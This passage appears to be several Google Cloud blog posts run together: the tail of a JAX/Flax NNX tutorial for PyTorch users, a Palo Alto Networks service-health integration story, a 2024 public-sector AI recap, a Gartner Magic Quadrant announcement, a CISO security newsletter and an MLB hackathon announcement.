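    # which JAX consumes directly in place of torch.Tensors
    features = np.stack([np.asarray(f) for f, _ in batch])
    labels = np.asarray([l for _, l in batch])
    return features, labels

# `train_dataset` is whatever PyTorch Dataset you already have
train_dataloader = DataLoader(train_dataset, batch_size=32,
                              shuffle=True, collate_fn=numpy_collate)
```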
Model definition
With Flax’s NNX API, defining your neural networks is very similar to doing so in PyTorch. Here we define a simple, two-layer multilayer perceptron in both frameworks, starting with PyTorch.
```python
import torch.nn as nn

class TitanicNeuralNet(nn.Module):
    def __init__(self, num_hidden_1, num_hidden_2):
        super().__init__()
        self.linear1 = nn.Linear(8, num_hidden_1)
        self.dropout = nn.Dropout(0.01)
        self.relu = nn.LeakyReLU()
        self.linear2 = nn.Linear(num_hidden_1, num_hidden_2)
        self.linear3 = nn.Linear(num_hidden_2, 1, bias=False)

    def forward(self, x):
        x = self.linear1(x)
        x = self.dropout(x)
        x = self.relu(x)
        x = self.linear2(x)
        x = self.dropout(x)
        x = self.relu(x)
        out = self.linear3(x)
        return out
```
NNX model definitions are very similar to the PyTorch code above. Both make use of __init__ to define the layers of the model, while __call__ corresponds to forward.
```python
from flax import nnx

class TitanicNNX(nnx.Module):
    def __init__(self, num_hidden_1, num_hidden_2, rngs: nnx.Rngs):
        self.linear1 = nnx.Linear(8, num_hidden_1, rngs=rngs)
        self.dropout = nnx.Dropout(0.01, rngs=rngs)
        self.relu = nnx.leaky_relu
        self.linear2 = nnx.Linear(num_hidden_1, num_hidden_2, rngs=rngs)
        self.linear3 = nnx.Linear(num_hidden_2, 1, use_bias=False, rngs=rngs)

    def __call__(self, x):
        x = self.linear1(x)
        x = self.dropout(x)
        x = self.relu(x)
        x = self.linear2(x)
        x = self.dropout(x)
        x = self.relu(x)
        out = self.linear3(x)
        return out
```
Model initialization and usage
Model initialization in NNX is nearly identical to PyTorch. In both frameworks, when you instantiate an instance of the model class, the model parameters are eagerly (vs. lazily) initialized and tied to the instance itself. The only difference in NNX is that you need to pass in a pseudorandom number generator (PRNG) key when instantiating the model. In keeping with JAX’s functional nature, it avoids implicit global random state, requiring you to explicitly pass PRNG keys. This makes PRNG generation easily reproducible, parallelizable, and vectorizable. See the JAX docs for more details.
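As a minimal sketch, assuming the model classes defined above, instantiation differs only by the explicit PRNG argument (the hyperparameter values are illustrative):

```python
from flax import nnx

# PyTorch: parameters are created eagerly at construction time
torch_model = TitanicNeuralNet(num_hidden_1=32, num_hidden_2=16)

# Flax NNX: identical, except an explicit PRNG seed drives initialization
nnx_model = TitanicNNX(num_hidden_1=32, num_hidden_2=16, rngs=nnx.Rngs(0))
```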
Training
There are some key differences in training loops between PyTorch and Flax NNX. To demonstrate, let’s build up to the full NNX training loop step by step.
In both frameworks, we create Optimizers and have the flexibility to specify our optimization algorithm. While PyTorch requires passing in model parameters, Flax NNX allows you to just pass in the model directly and handles all interactions with the underlying Optax optimizer.
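Side by side, the two constructions look roughly like this, reusing the models instantiated above (the learning rate is illustrative):

```python
import optax
import torch
from flax import nnx

# PyTorch: the optimizer receives the model's parameters
torch_optimizer = torch.optim.Adam(torch_model.parameters(), lr=0.01)

# Flax NNX: the optimizer wraps the model plus an Optax transform
nnx_optimizer = nnx.Optimizer(nnx_model, optax.adam(learning_rate=0.01))
```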
Perhaps the biggest difference between PyTorch and JAX is how to do a full forward/backward pass. With PyTorch, you calculate the gradients with loss.backward(), triggering AutoGrad to follow the computation graph from loss to compute the gradients.
JAX’s automatic differentiation is instead much closer to the raw math, where you have gradients of functions. Specifically, nnx.value_and_grad/nnx.grad take in a function, loss_fn, and return a function, grad_fn. Then, grad_fn itself returns the gradient of the output of loss_fn with respect to its input.
In our example, loss_fn is doing exactly what is being done in PyTorch: first, it gets the logits from the forward pass and then calculates the familiar loss. From there, grad_fn calculates the gradient of loss with respect to the parameters of model. In mathematical terms, the grads that are returned are ∂J/∂θ. This is exactly what is happening in PyTorch under the hood: whereas PyTorch is “storing” the gradients in the tensor’s .grad attribute when you do loss.backward(), JAX and Flax NNX follow the functional approach of not mutating state and just return the gradients to you directly.
In PyTorch, optimizer.step() updates the weights in place using the gradients. NNX also does an in-place update of the weights, but requires the grads you calculated in the backward pass to be passed in directly. This is the same optimization step that is done in PyTorch, just slightly more explicit, in keeping with JAX’s underlying functional nature.
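Putting the backward pass and the update together, a sketch of the NNX pattern looks like this (batch_features and batch_labels are illustrative names):

```python
import optax
from flax import nnx

def loss_fn(model):
    logits = model(batch_features)
    return optax.sigmoid_binary_cross_entropy(
        logits.squeeze(), batch_labels).mean()

# PyTorch equivalent: loss.backward(); optimizer.step(); optimizer.zero_grad()
loss, grads = nnx.value_and_grad(loss_fn)(nnx_model)  # grads mirror the params
nnx_optimizer.update(grads)  # weights updated in place, grads passed explicitly
```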
Full training loop
You now have everything you need to construct a full training loop in JAX/Flax NNX. Here is the complete loop; note how closely train_step mirrors the familiar PyTorch pattern of forward pass, backward pass, and update:
```python
import jax.numpy as jnp
import optax
from flax import nnx
from tqdm.auto import tqdm

def train(model, train_dataloader, eval_dataloader, num_epochs):
    optimizer = nnx.Optimizer(model, optax.adam(learning_rate=0.01))

    for epoch in (pbar := tqdm(range(num_epochs))):
        pbar.set_description(f"Epoch {epoch}")
        model.train()
        for batch in train_dataloader:
            train_step(model, optimizer, batch)

        pbar.set_postfix(train_accuracy=eval(model, train_dataloader),
                         eval_accuracy=eval(model, eval_dataloader))

@nnx.jit
def train_step(model, optimizer, batch):
    def loss_fn(model):
        logits = model(batch[0])
        loss = optax.sigmoid_binary_cross_entropy(logits.squeeze(), batch[1]).mean()
        return loss
    grad_fn = nnx.value_and_grad(loss_fn)
    loss, grads = grad_fn(model)
    optimizer.update(grads)

def eval(model, eval_dataloader):
    model.eval()
    total = 0
    num_correct = 0
    for batch in eval_dataloader:
        res = eval_step(model, batch)
        total += res.shape[0]
        num_correct += jnp.sum(res)
    return num_correct / total

@nnx.jit
def eval_step(model, batch):
    logits = model(batch[0])
    logits = logits.squeeze()
    preds = jnp.round(nnx.sigmoid(logits))
    return preds == batch[1]
```
The key takeaway is that the training loops are very similar between PyTorch and JAX/Flax NNX, with most of the differences boiling down to object-oriented versus functional programming. Although there’s a slight learning curve to functional programming and thinking about gradients of functions, it enables many of the aforementioned benefits in JAX, e.g., JIT compilation and automatic parallelization. For example, just adding the @nnx.jit annotations to the above functions speeds up training the model for 500 epochs from 6.25 minutes to just 1.8 minutes with a P100 GPU on Kaggle! You’ll see similar speedups with the same code across CPUs, TPUs, and even non-NVIDIA GPUs.
Flax Linen reference
As previously mentioned, the JAX ecosystem is very flexible and lets you bring in your framework of choice. Although NNX is the recommended solution for new users, the Flax Linen API is still widely used today, including in powerful frameworks like MaxText and MaxDiffusion. While NNX is far more Pythonic and hides much of the complexity of state management, Linen adheres much more closely to pure functional programming.
Being comfortable with both is greatly beneficial if you want to participate in the JAX ecosystem. To help, let’s replicate much of our NNX code with Linen, and include comments highlighting the main differences.
```python
import flax.linen as nn

# Model definition

# Input dimensions for relevant layers are inferred during init below.
# `initializer` is assumed to be a kernel initializer defined earlier,
# e.g. nn.initializers.glorot_uniform()
class TitanicNeuralNet(nn.Module):
    num_hidden_1: int
    num_hidden_2: int

    def setup(self):
        self.linear1 = nn.Dense(features=self.num_hidden_1, kernel_init=initializer)
        self.linear2 = nn.Dense(features=self.num_hidden_2, kernel_init=initializer)
        self.linear3 = nn.Dense(features=1, use_bias=False, kernel_init=initializer)
        self.dropout1 = nn.Dropout(0.01)
        self.dropout2 = nn.Dropout(0.01)

    def __call__(self, x, training):
        x = self.linear1(x)
        x = self.dropout1(x, deterministic=not training)
        x = nn.leaky_relu(x)
        x = self.linear2(x)
        x = self.dropout2(x, deterministic=not training)
        x = nn.leaky_relu(x)
        x = self.linear3(x)
        return x
```
```python
import jax

# Model Init

# Params are independent of the model definition, and init requires sample
# data for shape inference (`sample_data` is a representative input batch)
rng = jax.random.PRNGKey(42)
new_rng, subkey, subdropout = jax.random.split(rng, num=3)
flax_model = TitanicNeuralNet(num_hidden_1=32, num_hidden_2=16)
params = flax_model.init(subkey, sample_data, True)

# Model is called using apply, and both params and data must be passed in, in
# very functional programming style. Similarly, you distinguish between
# train/eval with a boolean and pass in a PRNG key for dropout
flax_model.apply(params, sample_data, True, rngs={'dropout': subdropout})
```
```python
# Full Training Loop
import jax
import jax.numpy as jnp
import optax
import flax.linen as nn
from flax.training import train_state
from jax import jit
from tqdm.auto import tqdm

# TrainState as a convenience wrapper to help with the management of
# parameters and gradients
optimizer = optax.adam(learning_rate=0.01)

state = train_state.TrainState.create(
    apply_fn=flax_model.apply,
    params=params,
    tx=optimizer,
)

def train(state, train_dataloader, eval_dataloader, subdropout, num_epochs):
    for epoch in (pbar := tqdm(range(num_epochs))):
        pbar.set_description(f"Epoch {epoch}")
        for batch in train_dataloader:
            state, loss = train_step(state, batch, subdropout)

        pbar.set_postfix(train_accuracy=eval(state, train_dataloader),
                         eval_accuracy=eval(state, eval_dataloader))

    return state

def eval(state, eval_dataloader):
    total = 0
    num_correct = 0
    for batch in eval_dataloader:
        res = eval_step(state, batch)
        total += res.shape[0]
        num_correct += jnp.sum(res)
    return num_correct / total

@jit
def train_step(state, batch, subdropout):
    def loss_fn(params):
        logits = state.apply_fn(params, batch[0], True, rngs={'dropout': subdropout})
        loss = optax.sigmoid_binary_cross_entropy(logits.squeeze(), batch[1]).mean()
        return loss

    grad_fn = jax.value_and_grad(loss_fn)
    loss, grads = grad_fn(state.params)
    # Pass grads to TrainState to get a new TrainState with updated
    # parameters, in functional programming style
    state = state.apply_gradients(grads=grads)
    return state, loss

@jit
def eval_step(state, batch):
    logits = state.apply_fn(state.params, batch[0], False)
    logits = logits.squeeze()
    preds = jnp.round(nn.sigmoid(logits))
    return preds == batch[1]
```
Next steps
With the JAX/Flax knowledge you’ve gained from this blog post, you are now ready to write your own neural network. You can get started right away in Google Colab or Kaggle. Find a challenge on Kaggle and write a brand new model with Flax NNX, or start training a large language model (LLM) with MaxText — the possibilities are endless.
And we have just scratched the surface with JAX and Flax. To learn more about JIT, automatic vectorization, custom gradients, and more, check out the documentation for both JAX and Flax!
Cloud incidents happen. And when they do, it’s incumbent on the cloud service provider to communicate about the incident to impacted customers quickly and effectively — and for the cloud service consumer to use that information effectively, as part of a larger incident management response.
Google Cloud Personalized Service Health provides businesses with fast, transparent, relevant, and actionable communication about Google Cloud service disruptions, tailored to a specific business at its desired level of granularity. Cybersecurity company Palo Alto Networks is one Google Cloud customer and partner that recently integrated Personalized Service Health signals into the incident workflow for its Google Cloud-based PRISMA Access offering, saving its customers critical minutes during active incidents.
By programmatically ingesting Personalized Service Health signals into advanced workflow components, Palo Alto can quickly make decisions such as triggering contingency actions to protect business continuity.
Let’s take a closer look at how Palo Alto integrated Personalized Service Health into its operations.
The Personalized Service Health integration
Palo Alto ingests Personalized Service Health logs into its internal AIOps system, which centralizes incident communications for PRISMA Access and applies advanced techniques to classify and distribute signals to the people responsible for responding to a given incident.
Personalized Service Health UI Incident list view
Users of Personalized Service Health can filter which relevance levels they want to see. Here, “Partially related” reflects an issue anywhere in the world with products the customer uses; “Related” reflects a problem detected within the customer’s data center regions; and “Impacted” means that Google has verified the impact to the customer for specific services.
While Google is still confirming an incident, Personalized Service Health communicates some of these incidents as ‘PSH Emerging Incidents’ to provide customers with early notification. Once Google confirms an incident, it is merged into ‘PSH Confirmed Incidents’. This helps customers respond faster to a specific incident that’s impacting their environment, or escalate back to Google if needed.
Personalized Service Health distributes updates throughout an active incident, typically every 30 minutes, or sooner if there’s progress to share. These updates are also written to logs, which Palo Alto ingests into AIOps.
Responding to disruptive, unplanned cloud service provider incidents can be accelerated by programmatically ingesting and distributing incident communications. This is especially true in large-scale organizations such as Palo Alto, which has multiple teams involved in incident response for different applications, workloads and customers.
Fueling the incident lifecycle
Palo Alto further leverages the ingested Personalized Service Health signals in its AIOps platform, which uses machine learning (ML) and analytics to automate IT operations. AIOps harnesses big data from operational appliances to detect and respond to issues instantaneously. AIOps correlates these signals with internally generated alerts to declare an incident that is affecting multiple customers. These AIOps alerts are tied to other incident management tools that assist with managing the incident lifecycle, including communication, regular updates and incident resolution.
In addition, a data enrichment pipeline takes Personalized Service Health incidents, adds Palo Alto’s related information, and publishes the events to Pub/Sub. AIOps then consumes the incident data from Pub/Sub, processes it, correlates it with related event signals, and notifies subscribed channels.
Palo Alto organizes Google Cloud assets into folders within the Google Cloud console. Each project represents a Palo Alto PRISMA Access customer. To receive incident signals that are likewise specific to end customers, Palo Alto creates a log sink that’s specific to each folder, aggregating service health logs at the folder level. Palo Alto then receives incident signals specific to each customer so it can take further action.
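A folder-scoped aggregated sink of that shape might look like the following. The IDs are placeholders and the service health log filter is an assumption; verify the exact log ID in the Personalized Service Health documentation.

```
gcloud logging sinks create prisma-health-sink \
  pubsub.googleapis.com/projects/PROJECT_ID/topics/service-health \
  --folder=FOLDER_ID --include-children \
  --log-filter='log_id("servicehealth.googleapis.com/event")'
```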
Palo Alto drives the following actions based on incident communications flowing from Google Cloud:
Proactive detection of zonal, inter-regional, and external en-masse failures
Accurate identification of workloads affected by cloud provider incidents
Correlation of product issues caused by service degradation in Google Cloud itself
Seeing Personalized Service Health’s value
Incidents caused by cloud providers often go unnoticed or are difficult to isolate without involving several of the cloud provider’s teams (support, engineering, SRE, account management). The Personalized Service Health alerting framework plus the AIOps correlation engine lets Palo Alto’s SRE teams isolate issues caused by a cloud provider near-instantaneously.
Palo Alto’s incident management workflow is designed to address mass failures versus individual customer outages, ensuring the right teams are engaged until the incidents are resolved. This includes notifying relevant parties, such as the on-call engineer and the Google Cloud support team. With Personalized Service Health, Palo Alto can capture both event types, i.e., mass failures as well as individual customer outages.
Palo Alto gets value from Personalized Service Health in multiple ways, beginning with faster incident response and contingency actions that optimize business continuity, especially for impacted customers of PRISMA Access. In the event of an incident impacting them, PRISMA Access customers naturally seek and expect information from Palo Alto. By ensuring this information flows rapidly from Google Cloud to Palo Alto’s incident response systems, Palo Alto is able to provide more insightful answers to these end customers. It also plans to serve additional use cases based on both existing and future Personalized Service Health capabilities.
Take your incident management to the next level
Google Cloud is continually evolving Personalized Service Health to provide deeper value for all Google Cloud customers — from startups, to ISVs and SaaS providers, to the largest enterprises. Ready to get started? Learn more about Personalized Service Health, or reach out to your account team.
2024 was a year of incredible innovation and progress, as we continue to invest in bringing the best of Google AI to our customers around the world. The public sector is adopting the latest AI technologies with the right guardrails built in, and we are seeing incredible energy around this technology in agencies across the country – whether that be gathering and analyzing information at the most critical times to create operational resilience and readiness, protecting our nation’s critical infrastructure and resources, or creating more innovative and secure ways to protect and serve constituents.
Google’s AI innovations and advancements are accelerating missions and impact, from advancing defense research at the Air Force Research Laboratory, to transforming DoD’s data utilization with generative AI, improving access to children’s behavioral healthcare resources with the Illinois Department of Human Services (DHS), addressing climate challenges with Hawaii Department of Transportation, modernizing infrastructure and supporting a cutting-edge research program with UC Riverside, and developing AI models to assist augmented reality microscope (ARM) detection of certain types of cancer with the Defense Innovation Unit (DIU).
Over the last year we unveiled transformative AI breakthroughs that will have a lasting and positive impact on people and society. Here are some of the latest AI innovations from Google that I am most proud of, that will help improve government services, enhance decision-making, and ultimately create a more efficient and effective public sector.
A leap forward in quantum computing
Google’s latest quantum computing chip, Willow, demonstrates significant advancements in the field. Willow has state-of-the-art performance across a number of metrics, enabling two major achievements. The first is that Willow can reduce errors exponentially as we scale up using more qubits. This cracks a key challenge in quantum error correction that the field has pursued for almost 30 years. Second, Willow performed a standard benchmark computation in under five minutes that would take one of today’s fastest supercomputers 10 septillion (that is, 10²⁵) years — a number that vastly exceeds the age of the Universe. For public sector customers, this means enhanced research capabilities, as quantum computing can revolutionize fields like life sciences and drug discovery by enabling complex simulations and analysis.
The next generation of AI models
In October 2024 at our Gemini at Work event, we showcased transformative generative AI use cases from our customers across industries and shared a number of announcements. Building on that momentum, we have made several exciting announcements, including Gemini 2.0 – our most capable model yet – which represents a significant evolution in AI capabilities and the next generation of models built for the agentic era. With new advances in multimodality — like native image and audio output — and native tool use, it will enable us to build new AI agents that bring us closer to our vision of a universal assistant.
We also unveiled Google Agentspace, which unlocks enterprise expertise for employees with agents that bring together Gemini’s advanced reasoning, Google-quality search, and enterprise data, regardless of where it’s hosted. We’ve also made important updates and upgrades, including:
NotebookLM, our powerful research assistant, used by millions globally, is getting even better with Gemini 2.0 Flash, a new interface, and premium features in NotebookLM Plus.
Project Mariner, which combines strong multimodal understanding and reasoning capabilities to automate tasks using your browser, and Project Astra, our research prototype exploring future capabilities of a universal AI assistant.
Open foundation models to help developers more easily build AI models for healthcare applications, initially focused on imaging applications in radiology, dermatology, and pathology. Our Nobel Prize-winning work with Google DeepMind further underscores how AI is accelerating scientific breakthroughs and being used to help address the world’s most pressing challenges.
For public sector organizations, we believe these advancements in AI, quantum computing, and other cutting-edge technologies will enable increased agility and efficiency by automating tasks and processes and freeing up resources for more strategic initiatives. We are also providing improved data accessibility through integration with existing data sources, and bolstering security by leveraging Google Cloud’s robust security infrastructure. Together, these advancements represent an exciting milestone in the Gemini era and highlight Google’s commitment to pushing the boundaries of technology and delivering innovative solutions for our customers.
Our commitment to the public sector
Looking ahead, we remain committed to helping our public sector customers – spanning state and local government, civilian, defense, and intelligence agencies – as they look to Google Public Sector to help meet their mission. We will continue to invest in our accredited commercial cloud, ensuring the public sector gets what the private sector gets: the same features, services, and compute power that’s critical for AI workloads. Today, we have 140 services and counting at FedRAMP High, as well as general availability of 51 services for CJIS compliance within Assured Workloads, including Vertex AI services. Google Cloud provides the most extensive data center footprint for FedRAMP High workloads of any cloud service provider, with nine U.S. regions to choose from.
In addition to investing in an open platform powered by the latest AI innovations and most robust security, we are also investing in training and upskilling the next generation of public sector leaders. We recently announced our Google Cloud Launchpad for Veterans – a no-cost training and certification journey to equip veterans in all roles and at all levels with the cloud knowledge and skills needed to drive innovation, and contribute to their employer’s digital transformation strategy. We also introduced a new AI training initiative through Google.org’s AI Opportunity Fund – with $15 million for AI skills training to help U.S. public sector workers develop responsible AI skills.
At Google Public Sector, we’re passionate about supporting your mission. Learn more about how Google’s AI solutions can empower your agency and see examples of how we are helping accelerate mission impact with AI here.
Gartner has recognized Google as a Leader in the 2024 Gartner® Magic Quadrant™ for Cloud Database Management Systems for the fifth year in a row. Google is positioned furthest in vision among all vendors evaluated; we believe this is a testament to Google’s innovations that help tens of thousands of Data Cloud customers across all industries build applications faster and unlock deeper insights through a unified data and AI approach.
Download the complimentary 2024 Gartner Magic Quadrant for Cloud Database Management Systems report.
AI is driving the need for better data management
A Gartner survey finds 61% of organizations are evolving their D&A (data and analytics) operating model because of AI technologies.1 With AI powering today’s biggest innovations, customers need a simpler way to unify and integrate their data. This is particularly true for businesses with a multi-layered data foundation, including various data models such as graph and document, semi-structured and unstructured data, and a variety of file formats and standards.
At the same time, organizations need AI-assisted tools and agents, as well as the ability to build these capabilities for their customers and employees. Simply put, they want to be innovators, not just integrators. And lastly, governance across the data estate and AI models is becoming even more critical, as gen AI opens up huge opportunities but also poses risks when not grounded in truth with enterprise data.
Driving innovation with Google’s AI-powered Data Cloud
Google provides a unified, intelligent and open Data Cloud that’s designed to address the most pressing data challenges facing customers today. Google’s Data Cloud is built on planet-scale infrastructure with AI at its core, empowering teams to unlock deeper insights and build applications faster. With unmatched reliability, performance, security, and global scale, it enables organizations to operate efficiently and solve their toughest data problems.
Leveraging Google’s deep expertise and decades of innovations, we have built a pre-integrated Data Cloud that seamlessly unifies data services, enabling them to work better together while delivering unique intelligence into the platform. We are committed to being the most open platform, offering unmatched choice and flexibility to meet diverse customer needs. And that’s why we believe the Gartner recognition is based on Google’s completeness of vision and ability to execute.
We’re delivering on three key pillars: an end-to-end unified data platform, accelerating innovation with AI-assistive and agentic experiences, and an open data ecosystem for the gen AI era. Let’s take a closer look at each.
End-to-end unified data platform
The unified data platform simplifies operations and enhances business outcomes by bringing together data management, governance, and analysis. We’ve built deep integration from data to AI, spanning AI infrastructure, foundation models, multiple storage options, and multiple engines. This unified multimodal data foundation enables multiple engines to work seamlessly together for analytics, streaming, machine learning, and AI.
Some recent advancements include:
BigQuery Unified Platform: We’re enhancing BigQuery’s multimodal data processing capabilities with support for structured and unstructured data, as well as diverse formats, including fully managed Iceberg tables, Delta, and Hudi. We introduced native BigQuery support for Apache Spark alongside SQL, offering flexibility in engine choice. BigQuery metastore now supports OSS engines such as Apache Spark and Flink. And with BigQuery universal catalog, we’ve simplified governance for the entire BigQuery platform, providing automated data discovery, curation and management at scale.
Multi-model data support: With the introduction of new Spanner Graph, full-text search and vector search capabilities, we’ve evolved Spanner to a multi-model database with intelligent capabilities that enable customers to deliver a new class of AI-enabled applications — all built on top of a globally consistent, virtually unlimited scale database that offers up to 99.999% availability.
Unified operational and analytical systems: We’re unifying operational and analytical workloads to drive real-time intelligence. With BigQuery and Spanner Data Boost, customers can now query live operational data directly without compromising performance of their operational systems. And with Reverse ETL through BigQuery and Bigtable integrations, customers can push those insights back into operational systems, closing the loop and driving immediate action.
Streaming and real-time intelligence: BigQuery empowers real-time insights with robust streaming and real-time support. We introduced continuous queries to analyze data as it streams into BigQuery, unlocking insights and enabling truly event-driven applications. And, with BigQuery Managed Service for Apache Kafka, organizations can easily ingest and process real-time data streams.
Accelerating innovation with AI-assistive and agentic experiences
The rise of generative AI has fueled a surge in data and machine learning operations as enterprises activate their data to unlock new possibilities. BigQuery, for example, has seen an 80% increase in machine learning operations in six months with customers running tens of millions of prediction and training queries every month, and nearly 7x growth in the use of LLMs for model inference in 2024. For operational data, AlloyDB supercharges PostgreSQL vector search and can scale to over a billion vectors with its ScaNN index, also available in BigQuery, while Spanner supports vector searches scaling to more than 10B vectors.
A few of the latest innovations include:
Activating AI on business data: We’re integrating AI deeper into our Data Cloud. Tight integration with Vertex AI provides access to 160+ Google and open-source foundation models, so businesses can perform LLM inferencing, ground, and fine-tune models directly within BigQuery, AlloyDB, Spanner, and Cloud SQL using their enterprise data. Document AI, Vision AI, and speech-to-text APIs enable scalable unstructured data analysis, with governance over multimodal data via object tables within BigQuery.
Vector search across Google’s Data Cloud: We are turbocharging vector search workloads, helping you quickly build intelligent AI applications with your own trusted, enterprise data for any customer or industry use case. Our built-in vector support across databases including BigQuery, AlloyDB, Cloud SQL, and Spanner lets you store and search vector embeddings with speed and ease, without moving data or managing additional systems. We’re also deeply integrating with third-party orchestration frameworks like LangChain and LlamaIndex for building increasingly sophisticated enterprise apps, and we continue to innovate with Google’s ScaNN algorithm, bringing 12 years of Google research to our Data Cloud customers.
Gemini across Google’s Data Cloud: BigQuery is advancing automation with Gemini data agents, enabling trusted and governed workflows across data engineering, governance, and analytics. Recently, we launched a conversational analytics agent that lets customers ask questions of their BigQuery data in natural language; this capability is also now available as a conversational analytics API for customers to build their own experiences. In addition, Gemini in Databases and Gemini in BigQuery give users an AI-powered assistant for fleet management, workload optimization, and data insights and exploration. Administrators also get proactive recommendations for managing, securing, governing, and optimizing databases, as well as code and schema conversions in Database Migration Service to supercharge legacy database modernization projects.
Open data ecosystem for the gen AI era
We are committed to being the most open cloud provider, empowering data teams to build modern, data-driven applications wherever their workloads reside. By supporting open source and open standards including Iceberg, Delta, Hudi, MySQL, Valkey, and PostgreSQL, Google Cloud enables teams to build Lakehouse architectures with fully managed services compatible with popular open-source engines and models.
Bringing cutting-edge technology to customers faster
As a Leader in this report for the past five consecutive years, we have witnessed remarkable growth with customers. For example:
APEX Fintech Solutions leveraged AlloyDB to achieve a 50% reduction in processing time, enabling margin calculations for 100,000 accounts in just one minute — a significant improvement in efficiency and scalability.
Bayer migrated to AlloyDB for PostgreSQL to streamline data operations, centralize solutions and improve collaboration across the company, which helped reduce response times by over 50% on average and increased throughput by 5x compared to its previous PostgreSQL solution.
What’s next
We are excited to work with you on your journey to the cloud in this gen AI era. To learn more about our placement, download the complimentary 2024 Gartner Magic Quadrant for Cloud Database Management Systems report.
Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved.
This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google.
Welcome to the second Cloud CISO Perspectives for December 2024. To close out the year, I’m sharing the top Google Cloud security updates in 2024 that attracted the most interest from the security community. There’s a lot of AI, of course, as well as a few surprises.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
–Phil Venables, VP, TI Security & CISO, Google Cloud
From gen AI to threat intelligence: 2024 in review
By Phil Venables, VP, TI Security & CISO, Google Cloud
While generative AI erupted from the confines of IT to the world at large in 2023, this year we saw gen AI begin to rapidly and truly change cybersecurity. At the same time, Google Cloud continued to drive towards our goals of bringing simplicity, streamlining operations, and enhancing efficiency and effectiveness for security essentials.
To that end, I’m sharing our top stories from four important areas of development in cybersecurity: security and AI, the security ecosystem, threat intelligence, and security operations.
Security and AI
At the end of 2023 in an update to my blog on security megatrends, I shared that enabling progress in AI means focusing on the opportunities it presents, the responsibilities we bear as we develop it, and securing AI from malicious use and hacking. This theme continued over the course of the year, as we encouraged both AI use cases in cybersecurity and the development of responsible AI use and risk management policies.
Threat intelligence
This year, our integrated threat intelligence products and services from across Mandiant, VirusTotal, and Google presented a comprehensive view of the threat landscape, helping customers to operationalize the data and enable a more proactive security program. We introduced our Google Cloud Threat Intelligence blog to share insight from all of the Google intelligence teams. We also announced new ways to help keep our customers safe, including updated best practices aligned to our Defender’s Advantage framework, expanded managed services, and additional avenues for threat intelligence sharing.
Security operations
We believe that a modern security operations solution should be intelligence-driven, AI-powered, and capable of fueling productivity while empowering defenders to handle new threats. We leaned into this approach this year, focusing on innovation, improvement, and education.
As security professionals, we know that threat actors will continue to innovate to achieve their mission objectives. To help defenders proactively prepare for the coming year, we put together this forecast report with insights from across Google. We look forward to sharing more insights to help organizations strengthen their security posture in the new year.
For more leadership guidance from Google Cloud experts, please see our CISO Insights hub.
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
The Prompt: Gen AI demystified: Understanding gen AI types and their risks: To help business leaders better understand AI uses, we’re looking at common types of gen AI and prioritized the risks for each. Read more.
How to make the cloud an engine for manufacturing success: In spite of challenges and threats facing the manufacturing sector, we see significant cause for optimism. Here’s why.
Google Cloud’s commitment to responsible AI is now ISO/IEC certified: We’re thrilled to announce that Google Cloud has achieved an accredited ISO/IEC 42001:2023 certification for our AI management system. Read more.
To help combat fraud, Google Cloud and Swift pioneer advanced AI and federated learning tech: To better combat fraud in cross-border payments, Swift joins with Google Cloud to develop anti-fraud AI and federated learning tech. Read more.
CTI Program Design Playbook is now available: To help you better operationalize threat intelligence, we’ve published the Cyber Threat Intelligence Program Design Playbook, developed for professionals who actively defend networks. Read more.
How Google Cloud helps navigate your DPIA and AI privacy compliance journey: We’re continually improving our DPIA Resource Center with updated content and guidance. Here’s what’s new.
How Virgin Media O2 uses Privileged Access Manager to achieve least privilege: Henry Tze, head of DevOps for Virgin Media O2, explains how Google Cloud powers the backbone of their daily operations and shares his insights. Read more.
Google Cloud first CSP to join BRC, MFG-ISAC, and affiliates to advance security: Google Cloud is proud to be the first cloud service provider to partner with the GRF Business Resilience Council and its affiliates. Read more.
Announcing expanded custom Org Policy portfolio of supported products: Our custom Organization Policy can help you safeguard cloud resources, and it now works with even more of our services. Read more.
How Google Cloud helps navigate compliance with NIS2: NIS2 may require new investments in security tools, talent, and processes. Here’s how Google Cloud can help. Read more.
Please visit the Google Cloud blog for more security stories published this month.
Introducing XRefer, a Gemini-assisted binary navigator: XRefer is a new Gemini-powered cluster analysis tool that can help analysts break down the structure of malware and its behavior, and also help them navigate its code for deeper analysis. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Google Cloud Security and Mandiant podcasts
Phil Venables on the future of resilience: Google Cloud CISO Phil Venables joins hosts Anton Chuvakin and Tim Peacock to discuss the apparent sudden rise of resilience, the PCAST report (and Google’s take on it), and the importance of leading indicators. Listen here.
Go beyond the blame game when sharing cloud responsibility: Rich Mogull, senior vice-president, cloud security, Firemon, and CEO, Securosis, talks about shared irresponsibilities and whether blame needs a framework with Anton. Listen here.
Detection as code and the rise of response engineering: Amine Besson, detection engineering tech lead, Behemoth Cyberdefence, chats with Anton about how to do detection engineering when you don’t want to engineer anything. Listen here.
Behind the Binary: From software cracking to threat hunting: Renowned threat hunter Ryan Chapman sits down with host Josh Stroschein to talk about his journey from a curious young hacker to a formidable force in cybersecurity, and the early days of reverse engineering. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in January with more security-related updates from Google Cloud.
Developers, it’s time to take your skills to the ballpark! Are you ready to step out of the bleachers and onto the field where code collides with my (and America’s) favorite pastime? Get ready to swing for the fences at the Google Cloud X MLB Hackathon — powered by the groundbreaking Gemini family of models. Submit your projects by February 4, 2025 for a chance to win big.
Batter up!
What’s in your equipment bag? Get ready to use:
Gemini: Google’s most capable AI models, built from the ground up for multimodality. We’re talking text, code, images, audio, and video — all understood and processed seamlessly. Plus, Gemini boasts lightning-fast response times and the power to handle massive datasets, so you can focus on building epic fan experiences.
Real MLB datasets: You’ll have access to a treasure trove of historical game data, stats and content. This is your chance to mine insights and unlock the hidden stories within America’s pastime.
